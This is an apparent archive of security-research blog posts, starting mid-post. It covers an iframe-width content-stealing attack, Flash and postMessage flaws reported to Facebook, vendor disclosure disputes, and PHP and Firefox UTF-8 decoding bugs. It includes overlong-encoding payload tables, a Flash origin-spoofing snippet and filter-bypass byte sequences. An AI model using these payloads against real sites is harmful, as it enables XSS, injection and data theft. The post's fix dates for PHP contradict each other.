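The subtraction step is plain arithmetic, sketched here in Python. The per-character widths are made up (`char_width` is a hypothetical formula, in units of 1/100 px, not a real font), and the sketch assumes widths simply add up with no kerning.

```python
def char_width(ch: str) -> int:
    """Made-up advance width for one character, in 1/100 px."""
    return 400 + 13 * (ord(ch) % 37)


def text_width(text: str) -> int:
    """Width of a line, assuming character widths simply add up."""
    return sum(char_width(ch) for ch in text)


line_1 = "hello, my name is"          # sequence (1)
line_3 = "hello, my name is bond."    # sequence (3)

# Only the two line widths are "measured"; their difference is what
# the extra characters " bond." contribute.
difference = text_width(line_3) - text_width(line_1)
```

Note that the difference also includes the separating space and the punctuation, which is one reason the recovered widths do not always map to a single clean word.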

The question now is.. how hard is it to go from the width of the word (or sequence of words) to the actual contents of them?

Turns out that usually, all letters have a different width, and as long as such width is unique, it's almost trivial to calculate which letters are in each wrapping (although we don't get the order of such letters).

Solving this is an instance of the classic knapsack problem, which I won't go into in detail. While we won't be able to get the order of the letters, we can get which letters are present to a reasonable degree of accuracy, which should be sufficient to make a very good guess of the value.
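A minimal sketch of that letter recovery in Python, written as a brute-force subset-sum search rather than an optimized knapsack solver. The letter widths in `LETTER_WIDTHS` are made-up integers (1/100 px) for a tiny alphabet, not measurements from a real font, and `letters_for_width` is a hypothetical helper name.

```python
from typing import Dict, List

# Hypothetical, unique per-letter widths in 1/100 px (made-up values).
LETTER_WIDTHS: Dict[str, int] = {
    "a": 619, "b": 700, "d": 713, "e": 641, "j": 311,
    "m": 1049, "n": 691, "o": 677, "s": 523,
}


def letters_for_width(target: int, widths: Dict[str, int],
                      max_letters: int = 8) -> List[str]:
    """Return every multiset of letters (as a sorted string) whose
    widths add up exactly to `target`. The order of letters is unknown."""
    items = sorted(widths.items())
    results: List[str] = []

    def search(start: int, remaining: int, chosen: List[str]) -> None:
        if remaining == 0:
            results.append("".join(chosen))
            return
        if len(chosen) == max_letters:
            return
        for i in range(start, len(items)):
            letter, width = items[i]
            if width <= remaining:
                chosen.append(letter)
                search(i, remaining - width, chosen)  # letters may repeat
                chosen.pop()

    search(0, target, [])
    return results


# Width of the word "bond" under the made-up table above.
bond_width = sum(LETTER_WIDTHS[c] for c in "bond")
candidates = letters_for_width(bond_width, LETTER_WIDTHS)
```

Each candidate is a bag of letters, so "bdno" stands for any ordering of those four letters; picking the right word from the bag is the guessing step.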

It's unclear what the best solution to this problem is. This information leak isn't a vulnerability per se in browsers, but rather a well known and understood feature. This blog post will hopefully trigger some discussion around this subject so we can come up with solutions.

One challenge is that if we stopped providing mozInnerScreenY / screenTop, then it would be significantly harder to detect and protect against clickjacking. So whichever solution we come up with needs to take that into consideration.

It's also worth mentioning what happens when our iframe is so small that a word doesn't even fit. Well, the answer is that individual characters wrap to the next line, and we can then extract the width of each individual character (rather than each word). This, unfortunately, doesn't work that well in normal websites, as by default they don't break words (unless overridden by CSS's break-word). If we are able to get this, however, it would be possible for us to obtain the order of the characters in each word (and completely read the contents of the iframe without having to guess).

And that was it! This attack allows you to steal contents from websites that don't use X-Frame-Options (or have a fixed CSS width) in all major browsers with standard browser functionality (no vuln up my sleeve!). I felt inclined to use an acronym for this attack (WOLF) since Thai Duong/Juliano Rizzo's attacks (POET, BEAST, CRIME) sound better than "cross-BLAH-jacking", and I like wolves (although, not as much as cats), especially since it kind of feels like insanity wolf to me.

Friday, December 16, 2011

Doing Cross Page Communication Correctly

I haven't updated this blog in more than one year (woops), but it seems like I still have a couple of followers, so I was thinking about what to write. I was originally planning to post this in August, but the fix was delayed more than expected.

I decided to choose a random target on the interwebs to find an interesting vuln, and since Facebook recently launched its "Whitehat Program", which rewards people who report security vulnerabilities to them (kinda the same as Google's Vulnerability Reward Program), I chose them.

(Note: As of December 15, Facebook says they have fixed the vulnerability, and awarded a $2,500 USD bounty).

So, I took a look at their "main JS file":

And well, the first thing that came to my mind was RPC. Mostly because I worked on implementing Apache Shindig's version of the Flash RPC, and have helped review easyXDM's implementation, I just knew this is too hard to get right.

A simple grep for ".swf" in their all.js file led us to "/swf/XdComm.swf". And since I didn't know what domain that was on I tried:

And that worked.

So let's see.. I sent it to and we get this:

There are several non-security-bugs in that code (some of which I decided to ignore for brevity and keep the WTF quota of this blog low).

In general the security problems found are not specific to FB at all; they are mostly side effects of bad design decisions from either Flash or the browsers. However, these problems are widely known and can be abused by attackers to compromise information.

Calling Security.allowDomain

The first thing I notice is that XdComm calls Security.allowDomain and Security.allowInsecureDomain. This allows executing code in the context of so it's a Flash XSS, FAIL #1.

The way you exploit this is by loading the victim SWF inside the attacker's SWF. That's it. The problem here is that Adobe provides only one API for enabling two very different functionalities. In this case, what Facebook wants is just allow an HTML container to call whitelisted 'callbacks' from the SWF, but inadvertently it is also allowing anyone to load the SWF inside another SWF and access all methods and variables, which can result in code execution.

Adobe actually acknowledges this is a problem, and they will make changes to support these two different use cases. The reason I don't provide a PoC is that there are several applications out there that depend on this behavior and can't easily deploy any fixes, and Adobe is working on fixing this in Flash (which is where it should be fixed). When there's a viable alternative or a good solution I'll post a PoC.
What FB should have done is keep this SWF out of

Getting the embedding page location

The second thing I notice is that it's getting the origin of the page hosting the SWF calling:
this.currentDomain ="self.document.domain.toString");
And as any Flash developer should know, isn't something you can actually trust, so now you can "cheat" XdComm.swf into thinking it's being embedded by a page it isn't by simply overriding __flash__toXML.

So, by abusing this vulnerable check, we can actually listen and send messages on any LocalConnection channel. This not only means we just defeated the security of the transport, but also that, if any other SWF file uses LocalConnection in (or, we can sniff into that as well. So, FAIL #2.

It is hard for a movie (or any plugin) to know with certainty where it's being hosted. A SWF can be sure it's being hosted on the same domain by requiring the hosting page to call a method in the movie (added by ExternalInterface.addCallback), since by default Flash only allows pages hosted in the same domain to call callback methods of a movie (this is what we do in Shindig, for example), but besides that it's not so simple.

Some insecure methods exist and are widely used to know the hosting page, such as calling:"window.location.toString")
There are some variations of that code, such as calling window.location.href.toString, which is also simple to bypass by rewriting the String.toString method, and works on all browsers.

It's futile to try to "protect" those scripts, because of the way Flash handles ExternalInterface, it's possible to modify every single call made by the plugin, since when you call, what really happens is that the plugin injects a script to the window with:
ExecScript('try { __flash__toXML(' + yourCode + ') ; } catch (e) { "<undefined/>"; }');

And, __flash__toXML is a global function injected by Flash, which can be modified to return whatever we want.
    var o;
    window.__flash__toXML = function () { return o("potato") };
    window.__defineSetter__("__flash__toXML", function(x) {o = x;});
It's worth noting that Flash also bases some of its security decisions on the value of window.location (such as whether a movie is allowed to be scripted from a website or not), and while this check is more difficult to tamper with (and browsers actively fix it), it's still possible to do it, and it's even easier on other browsers such as Safari (in Mac OS), where you can just replace the functions "__flash_getWindowLocation" and "__flash_getTopLocation".

Luckily, it seems like we might be able to get at least the right Origin in future versions of Flash, as Mozilla is proposing a new NPAPI call just for this. Let's just hope that Adobe makes this available to the SWF application via some API.

What FB should have done is namespace the channel names, and use some other way of verifying the page embedding the SWF (like easyXDM or Shindig do).

It is also possible for an attacker to specify what transport it wishes to use, so we might be able to force a page to use the Flash transport even when it might also support postMessage.

postMessage should be used cautiously

There's one last thing I found. Facebook has a file which seems to allow an attacker to forge (postMessage) messages as coming from into another page that allows framing arbitrary pages.

The Proof of Concept is located at

As you can see the page will allow an attacker to send messages and will also allow the attacker to specify the target origin. The attack seems to be hard to do since the "parent" seems to be hard coded. So this is FAIL #3.

This is a good demonstration of why the existing implementation of postMessage is fundamentally broken: it's really easy for two different scripts to interfere with each other. I can't actually blame FB for that, it's more like a design problem in postMessage.

Luckily there's a new mechanism to use postMessage (called channel messaging), which partly solves this problem (or at least makes it harder to happen). You can read more about it here:

Random fact.. This is what Chrome uses internally to communicate with other components like the Web Inspector.

Vendor Response

I reported these issues from on Tuesday Aug 16 2011 at 2 PM (PST), with the draft of this blogpost, and got a human acknowledgement at 7PM. The issue was finally fixed on December 15 2011.


So well, this was my first post of 2011 (it's December!), and I actually made it because there were a few pieces of "de facto" knowledge about Flash that I wanted to put in writing somewhere, and because I had a look at Facebook regarding something not strictly related to work!

In general I am impressed by the security of Facebook applications. While doing this I got locked out of my account like 5 or 6 times (maybe they detected strange behavior?), I noticed several security protections in their API, and they actually do protect against other security vulnerabilities that most websites don't know about (such as escaping bugs, content type sniffing, etc).

I was awarded a $2,500.00 USD bounty for this report (not sure how it was calculated), and I'm considering donating it to charity (it can become 5k!). Any suggestions?

Monday, July 05, 2010

Full Disclosure, Reverse Responsible Disclosure and Bob


I know I haven't posted for a long time, sorry.. I hope I still have some followers.

Today was an interesting day, I started the day with yet-another-xss on some social website, and I found a vulnerability (kinda lame) on Paypal, later in the day I met my girlfriend's parents, and now it's late, so I'm writing a blogpost.. One vulnerability report was done in a 'responsible way', and the other, in what I just called 'reverse responsible disclosure'.. I like to invent buzzwords (and they are all jokes, please don't use them in real life).

I do think responsible disclosure is important, mostly because giving advance notice to the vendor allows them to work on a fix before the bad guys start exploiting it. That's what I've been using, and what I think is the right thing to do. However, this is something that depends on the vendor as much as on the researcher.

I've been working with several vendors on fixing vulnerabilities, most notably Microsoft and Google. Both (in my opinion) do work hard to fix stuff. Microsoft takes considerably more time to fix stuff, but they do communicate with me, letting me know what they are doing, and also share their ideas of fixes with me, in case I have any opinions (and they do take them into consideration). This dialog, or a swift fix of vulnerabilities (like today's youtube XSS that was fully disclosed but apparently fixed fast enough), is what I consider a responsible response from the vendor.. I know this is not an opinion shared across the whole industry, and that the loooooooong patching cycles of Microsoft are largely criticised, but in general, they are not so bad apart from that.

Other vendors that work similarly are Adobe and Symantec (humm, except for this girl that seems to have a job she shouldn't), and I was happy to work with them as well.

Now, the bad guys..


While their developers seem to understand security vulnerabilities, their PM is probably living in the stone age.

Some time ago, a security community I'm a member of created a project to make a security audit of SMF 2.0 before using it. It was great, the project found around 45 vulnerabilities, half of them serious, and they were mostly fixed (not all of them, but most of them were). The change log included credits and all, so it was great, and we declared the project a success.

However, a few months later, the PM of SMF asked Google to close our project page, because we were 'violating their license', which Google had to comply with. I had to remove the comments on the code, and the patches, code reviews, and repositories, so Google could re-enable the project page.

Overall, this sucks. We did the project to help them, and we did ask them BEFORE if the way we were going to work was correct. I even sent an email asking for permission to redistribute their code with patches, but since I had no response, I decided to just mirror it for code reviews, but not modify it. They keep on saying it's their right to protect their code, etc.. but I really do think they acted wrongly by not notifying us first (they had our contact email, and we exchanged a LOT of emails) when we did them a favor.

In the future, I don't recommend working with them, if you don't want to be stabbed in the back. I do think this response was very lame on their part.


Some of you may know Daniel Kerr, the developer of Open Cart, who thinks that Paypal, Google and Yahoo are always vulnerable to CSRF, and that an antivirus would stop CSRF attacks (which made more than one person laugh for a while). Someone already had a media circus with this guy (he actually sabotaged the security patches that another guy did because he refused to fix them). But now I will talk about something else.

A good friend, WHK, is a skilled developer who does security audits as a hobby. He is known for finding stuff in several popular CMS and he found a couple of vulnerabilities in OpenCart, so he documented them. Overall, there are Local File Inclusion vulnerabilities, direct remote code execution, and yet another CSRF vulnerability that allows an attacker to completely compromise the server. His English is not very good so he asked me to contact the developer, which I did. My email said that WHK and a few other users were going to do a free audit of OpenCart, and that he would get notified before the new vulnerabilities were made public.

His response was:

I prefer if you mind your own business and not bother me or the opencart community. The exploit that is being discussed will be fixed in the next release. I don't need your services. Stop wasting my time.

Stop bothering me!

So, we did stop bothering him since then, and now there are a total of 14 vulnerabilities. These vulnerabilities are now private, because we think he won't fix them if we make them public (as he hasn't fixed the first ones). And we can't make them public, because thousands of users use OpenCart and they actually manage security sensitive information. (In this case I don't think full disclosure will work).

Knowing that Daniel Kerr has a bad history even with fully disclosed vulnerabilities, we are clueless about what to do. The best thing may be to urge everyone to stop using OpenCart as soon as possible.


So, the paypal help center was vulnerable to an XSS for over 1 year, with a vulnerability that I reported to them 3 years ago.. and it was only fixed because someone posted it on ( Since then, I felt it was not worth privately reporting stuff to them. But actually I didn't find any other vulnerabilities on paypal until recently.

So, today I found one that is actually not really dangerous, and requires the victim to be logged in on a place they probably won't be logged in.. And since full disclosure seems to be the only way to catch their attention, I did it.. and tweeted about a clickjacking attack that allows you to send money to your account from a victim with 2 clicks.

Anyway, I don't think this can be abused in real life, but I do think it should be fixed, so after posting it on twitter, I waited a few hours and then reported it to paypal with a few suggestions on how to fix it. This is what I called reverse responsible disclosure.

What about Bob?

Well, I did find an XSS in a popular social network! But since they behaved cool in the past, I decided to report it privately, and let them fix it.. I may make it public when it's fixed, but I don't think it's interesting enough (it's on the search engine.. They made a new version and forgot to check for <> in JS strings).

So.. that's pretty much all.

What I think will happen now

1. The SMF guys will react and write me an email/comment/blogpost saying what an evil and unreasonable man I am.
2. Daniel Kerr from OpenCart will probably start trolling about this on email/his forum, without fixing any vulnerabilities whatsoever.
3. Paypal will fix these vulnerabilities, and say I was a bad guy.
4. Bob will fix the bug.

Soooo, that's all, I was really biting my tongue on the opencart/smf responses.. And I am happy that I finally found the time to write about it.

And this is not intended to be used in the famous disclosure debate, or similar, it's just catharsis after dealing with this couple of lame vendors (except for bob, bob is cool, hi bob!).

Thanks for reading..

PS. I just noticed AdSense is showing Paypal ads on my site.. lol, that reminded me when the caesars palace twitter account retweeted how to hack their own wireless network.

Thursday, October 15, 2009

A couple of unicode issues on PHP and Firefox

Well, here I am developing ACS, finding that this project resembles to some degree the creation of a browser.. but anyway, it's close to a working beta (yay!).

In any case, a couple of bugs came to my attention, some of them are public, some of them are not.

First of all, I want to describe the PHP vulnerability I made public in my presentation with David Lindsay at Blackhat USA 2009, whose danger apparently only Chris Weber, Giorgio Maone (creator of NoScript), Mario Heiderich (creator of PHP-IDS) and the Acunetix security team have realized.

It has been reported, well, more than enough times to the PHP team (I made another attempt today, hoping this will get fixed some time soon.. if at all). This issue affects all PHP versions Mario Heiderich and I could test, and endangers practically all PHP programs that use the utf8_decode() function for decoding (as recommended by OWASP guidelines).

The disclosure timeline follows:
* Reported by May 11 2009
* Discovered by June 19 2009
* Discovered by Giorgio Maone / Eduardo Vela: July 14 2009
* Reported and Fixed on PHPIDS: July 14 2009
* Microsoft notified of a XSS Filter bypass: July 14 2009
* Fixed XSS Filter bypass on NoScript 1.9.6:  July 20 2009
* Vulnerability disclosed on BlackHat USA 2009: July 29 2009
* Added signature to Acunetix WVS: August 14 2009
* Re-reported by September 27 2009
* Vendor claims it was fixed on 5.2.11: September 29 2009
* Re-re-reported by after checking 5.2.11: October 16 2009
* Published October 16 2009

You can check the bug here:

In reality there are several vulns in just a couple of lines, so I'll describe them here:
1.- Overlong UTF-8:
As REQUIRED by UNICODE 3.1, and noted in the Unicode Technical Report #36, a UTF-8 decoder is forbidden from interpreting a character's non-shortest form.

VULN: PHP makes no checks whatsoever on this matter.

Why is this a vulnerability?

A filter (such as addslashes, htmlentities, escapeshellarg, etc.) will NOT be able to detect and escape such byte sequences, so an application that relies on them for security checks won't be protected at all. It allows an attacker to encode "dangerous" chars, such as ', ", <, ;, &, \0 in different ways:

' = %27 = %c0%a7 = %e0%80%a7 = %f0%80%80%a7
" = %22 = %c0%a2 = %e0%80%a2 = %f0%80%80%a2
< = %3c = %c0%bc = %e0%80%bc = %f0%80%80%bc
; = %3b = %c0%bb = %e0%80%bb = %f0%80%80%bb
& = %26 = %c0%a6 = %e0%80%a6 = %f0%80%80%a6
\0 = %00 = %c0%80 = %e0%80%80 = %f0%80%80%80

Use hackvertor to generate them.
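The table above can also be reproduced with a few lines of Python. This is only a sketch: `overlong_utf8` and `percent_encode` are hypothetical helper names, and the code deliberately builds sequences that a correct UTF-8 encoder would never emit.

```python
def overlong_utf8(code_point: int, length: int) -> bytes:
    """Encode `code_point` in exactly `length` bytes (2 to 4),
    even when a shorter form exists (i.e. an overlong encoding)."""
    if length not in (2, 3, 4):
        raise ValueError("length must be 2, 3 or 4")
    lead_prefix = {2: 0xC0, 3: 0xE0, 4: 0xF0}[length]
    payload_bits_in_lead = {2: 5, 3: 4, 4: 3}[length]
    value = code_point
    tail = []
    for _ in range(length - 1):
        tail.append(0x80 | (value & 0x3F))  # continuation byte 10xxxxxx
        value >>= 6
    if value >= (1 << payload_bits_in_lead):
        raise ValueError("code point does not fit in that many bytes")
    return bytes([lead_prefix | value] + tail[::-1])


def percent_encode(data: bytes) -> str:
    """URL-style percent encoding of every byte."""
    return "".join("%{:02x}".format(b) for b in data)


for ch in "'\"<;&\0":
    forms = [percent_encode(overlong_utf8(ord(ch), n)) for n in (2, 3, 4)]
    print(repr(ch), "=", " = ".join(forms))
```

A strict decoder, such as Python 3's own `bytes.decode("utf-8")`, rejects every one of these sequences, which is the behavior the Unicode requirement asks for.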

This enables attacks on systems that use addslashes, for example (but almost all encoding functions would be vulnerable):

// add slashes!
foreach($_GET as $k=>$v)$_GET[$k]=addslashes("$v");

//  .... some code ...

// $name is encoded in utf8
mysql_query("SELECT * FROM table WHERE name='$name';");


2.- Ill formed sequences:
As REQUIRED by UNICODE 3.0, and noted in the Unicode Technical Report #36, if a leading byte is followed by an invalid successor byte, then it should NOT consume it.

VULN: PHP will consume invalid bytes.

Why is this a vulnerability?

It will allow an attacker to "eat" control chars. For example:

// htmlentities
foreach($_GET as $k=>$v)$_GET[$k]=htmlentities("$v",ENT_QUOTES);

//  ... some code ...


//  ... some code ...

$profileImage="<img alt=\"Photo of $name\" src=\"http://$url\" />";

// ... some code ...
echo utf8_decode($profileImage);

A request such as:


Will execute the code "alert(1)" when the page loads.
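How a lenient decoder "eats" a character can be sketched in Python. To be clear, `decode_lenient` is a hypothetical toy decoder written for this illustration, not PHP's actual code; it only handles single bytes and two-byte sequences, and its bug is that it never checks that the second byte is a real continuation byte (10xxxxxx).

```python
def decode_lenient(data: bytes) -> str:
    """Toy decoder with the bug described above: after a two-byte lead
    (0xC0..0xDF) it consumes the next byte without validating it."""
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            # BUG (on purpose): data[i + 1] is not checked to be 10xxxxxx
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


# The attacker ends the value with a lone lead byte, right before the
# quote that the page itself adds to close the attribute.
attribute = b'alt="Photo of \xc2" src="x"'
decoded = decode_lenient(attribute)
```

In `decoded` the quote that should have closed the alt attribute is gone (merged with 0xC2 into a single character), so whatever comes next is still parsed as part of the attribute value. A strict decoder would reject the input instead.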

Note that htmlpurifier does a utf8_decode function call at the end of the decoding, BUT they are safe because of a pre-encoding made by htmlpurifier.. other code that does the same won't be so lucky.

Bogdan Calin from Acunetix WVS described a couple of other potential attack scenarios:

Where an attacker could fool the filter by doing a request like:


Where an attacker could fool the filter by doing a request like:

3.- Integer overflow:
An unsigned short has a size of 16 bits (2 bytes), so it is INCAPABLE of storing unicode characters of 21 bits, which are represented in UTF-8 with 4 bytes (1111 0xxx 10xx xxxx 10xx xxxx 10xx xxxx). PHP attempts to store a 21-bit value in a 16-bit variable, and then makes no checks on the value.

The affected code follows:

//  php/ext/xml/xml.c#558
PHPAPI char *xml_utf8_decode(    //  ...
    int pos = len;
    char *newbuf = emallo    //  ...
    unsigned short c;          // sizeof(unsigned short)==16 bits
    char (*decoder)(unsig    //  ...
    xml_encoding *enc = x    //  ...
//  ...
//  #580
    c = (unsigned char)(*s);
    if (c >= 0xf0) {         /* four bytes encoded, 21 bits */
        if(pos-4 >= 0) {
            c = ((s[0]&7)<<18) | ((s[1]&63)<<12) | ((s[2]&63)<<6) | (s[3]&63);
        } else {
            c = '?';
        }
        s += 4;
        pos -= 4;
//  ...

The relevant parts of the code are, of course, the declaration of c as an unsigned short, the comment specifying that the char is 21 bits, and this:
c = ((s[0]&7)<<18) | ...

(s[0]&7)<<18 means it will move 3 bits 18 positions to the left. As we noted before, c's size is only 16 bits, so all 3 of those bits are lost.
(xxxx xxxx & 0000 0111) << 18

Also, this part:
...  ((s[1]&63)<<12) | ...

(s[1]&63)<<12 means it will move 6 bits 12 positions to the left. So, the top 2 of those bits are going to be lost.
(xxxx xxxx & 0011 1111) << 12

This allows us to make something even more interesting.

Code like this:

%FF%F0%40%FC, which is invalid unicode, overlong, and all you want (definitely NOT valid), will be cast to a "less than" symbol (<).
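The truncation can be checked by hand with a short Python sketch. It mirrors the four-byte expression from the C excerpt above and then keeps only the low 16 bits, which is what assigning to an unsigned short does; `decode_four_bytes_truncated` is a hypothetical name used only for this illustration.

```python
def decode_four_bytes_truncated(s: bytes) -> int:
    """Same arithmetic as the four-byte branch of the C excerpt,
    followed by truncation to 16 bits (the unsigned short)."""
    full = ((s[0] & 7) << 18) | ((s[1] & 63) << 12) | ((s[2] & 63) << 6) | (s[3] & 63)
    return full & 0xFFFF  # bits 16 and above do not fit in the variable


payload = bytes([0xFF, 0xF0, 0x40, 0xFC])
full_value = ((payload[0] & 7) << 18) | ((payload[1] & 63) << 12) \
    | ((payload[2] & 63) << 6) | (payload[3] & 63)
truncated = decode_four_bytes_truncated(payload)

print(hex(full_value), "->", hex(truncated), "->", repr(chr(truncated)))
```

The untruncated value is 0x1f003c; once the bits above 16 are dropped only 0x3c remains, which is the "<" character.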

This, besides the already mentioned problems and the possibility of bypassing quite a lot of WAFs and filters, demonstrates the problem of a bad unicode implementation in PHP.

I hope the PHP development team acknowledges all these issues, which have been reported before, were explained some months ago at Blackhat USA (and the developers were told to check the ppt more than once), and now are explained yet another time.

This was fixed on 5.2.11 :) on my birthday!! Sept 17

Anyway.. that's not all, now to finish this post I want to publish an overlong utf-8 exception on Firefox (actually, Mozilla's).

The firefox one

Firefox is supposed to consider the non-shortest form exception (point #1 in the PHP vulnerabilities, and section 3.1 of the Unicode Technical Report #36), but apparently there's a flaw in it. This is especially problematic because an overlong unicode sequence that is not rejected may allow several types of filter bypasses.

Anyway, the severity of this vulnerability is not as high as the PHP ones, but is worth mentioning. The following non-shortest form for the char U+1000:
0xF0 0x81 0x80 0x80

is allowed, as well as the correct shortest form:
0xE1 0x80 0x80

Note that this problem is only present in the 4-byte representation.
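For comparison, here is how a strict decoder treats the two forms, sketched with Python 3's built-in UTF-8 codec (used only as a reference point, it says nothing about Mozilla's code). `four_byte_payload` and `strict_decode_ok` are hypothetical helper names.

```python
def four_byte_payload(data: bytes) -> int:
    """Code point carried by a 4-byte UTF-8 shaped sequence,
    computed without any validity checks."""
    return (((data[0] & 0x07) << 18) | ((data[1] & 0x3F) << 12)
            | ((data[2] & 0x3F) << 6) | (data[3] & 0x3F))


def strict_decode_ok(data: bytes) -> bool:
    """True if Python's strict UTF-8 decoder accepts the bytes."""
    try:
        data.decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


OVERLONG = bytes([0xF0, 0x81, 0x80, 0x80])   # non-shortest form of U+1000
SHORTEST = bytes([0xE1, 0x80, 0x80])         # correct form of U+1000

print(hex(four_byte_payload(OVERLONG)))      # the code point the overlong form carries
print(strict_decode_ok(OVERLONG), strict_decode_ok(SHORTEST))
```

Both sequences carry the same code point, but only the three-byte form should ever be accepted.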

You can track this bug at:

Anyway, that's all! Thanks for your time :)